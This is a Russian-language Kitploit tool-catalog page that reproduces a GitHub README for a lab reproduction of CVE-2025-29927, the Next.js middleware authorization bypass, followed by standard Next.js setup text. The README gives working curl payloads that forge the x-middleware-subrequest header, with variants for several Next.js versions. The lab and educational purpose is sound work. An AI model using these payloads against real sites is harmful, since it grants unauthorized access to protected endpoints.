Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-2995 — Воспроизведение обхода авторизации CVE-2025-29927 в middleware Next.js с использованием эксплойт-пейлоадов на основе curl для нескольких версий. | Kitploit
Инструменты/GitHubGitHub/huynguyen12536/cve-2025-2995
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhuynguyen12536/cve-2025-2995

CVE-2025-2995

Воспроизведение обхода авторизации CVE-2025-29927 в middleware Next.js с использованием эксплойт-пейлоадов на основе curl для нескольких версий.

Репозиторий
7 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Воспроизведение обхода авторизации CVE-2025-29927

Этот репозиторий является воспроизведением уязвимости CVE-2025-29927 в пакете next

Как воспроизвести

  1. Выполните следующие шаги, чтобы клонировать и запустить приложение Next.js
  2. Проверьте, что авторизация запрещает доступ к эндпоинту /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Проверьте, что авторизация работает при предоставлении токена
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Теперь её можно обойти, если вложить middleware 5 раз в специальный заголовок x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Эксплуатация CVE-2025-29927 для старых версий Next.js

В версиях Next.js 12 и 13 использовалась другая конвенция именования файла middleware (_middleware.js), которая была изменена на middleware.js в Next.js 14. Эту уязвимость можно эксплуатировать в старых версиях, используя файл _middleware.js.

Например, следующие полезные нагрузки будут применимы в зависимости от версии Next.js и вашей конвенции маршрутизации:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (для версий Next.js 12.2 с файлом middleware.js в корне приложения, а не внутри директории pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (для версий Next.js 11 и до 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Начало работы

Сначала запустите сервер разработки:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Откройте http://localhost:3000 в вашем браузере, чтобы увидеть результат.

Вы можете начать редактирование страницы, изменив app/page.js. Страница автоматически обновляется при редактировании файла.

Этот проект использует next/font для автоматической оптимизации и загрузки Geist, нового семейства шрифтов для Vercel.

Узнать больше

Чтобы узнать больше о Next.js, ознакомьтесь со следующими ресурсами:

  • Документация Next.js — узнать о возможностях и API Next.js.
  • Изучить Next.js — интерактивный учебник по Next.js.

Вы можете посетить репозиторий Next.js на GitHub — ваши отзывы и вклад приветствуются!

Развертывание на Vercel

Самый простой способ развернуть ваше приложение Next.js — использовать Платформу Vercel от создателей Next.js.

Ознакомьтесь с нашей документацией по развертыванию Next.js для получения более подробной информации.

Скачать инструмент